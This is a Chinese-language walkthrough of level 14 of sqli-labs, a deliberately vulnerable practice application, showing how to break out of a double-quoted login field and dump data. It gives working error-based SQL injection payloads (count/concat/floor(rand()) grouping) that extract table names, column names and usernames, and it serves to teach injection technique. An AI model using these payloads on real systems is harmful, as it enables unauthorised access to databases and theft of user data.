Sqlilabs-14

这里来到了第 14 关，题目是个忽悠，说是单引号+括号，整的跟 13 关一样但其实就是个大忽悠

在 Hackbar 上做注入，这一关 hackbar 又可以用了…这是属于哪波操作？

uname=admin'&passwd=111&submit=submit 回显正常[这时你就知道题目忽悠人了]
uname=admin"&passwd=111&submit=submit 回显报错[说明是双引号的人，没错了]
uname=admin"#&passwd=111&submit=submit 回显正常

猜测可控数列：
uname=admin" order by 3#&passwd=111&submit=submit
uname=admin" order by 2#&passwd=111&submit=submit

uname=admin" union select 1,2#&passwd=111&submit=submit

注：该报错类型的sql注入需要刷新，可能一两次并不会返回到需要的结果
–查表
uname=admin" union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand()*2))a from information_schema.tables group by a#&passwd=111&submit=submit

–查列
uname=admin" union select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand()*2))a from information_schema.tables group by a#&passwd=111&submit=submit

–查数据
uname=admin" union select count(*),concat((select username from users limit 0,1),floor(rand()*2))a from information_schema.tables group by a#&passwd=111&submit=submit

通过修改 limit 即可得到全部数据，在这里就不一一列举了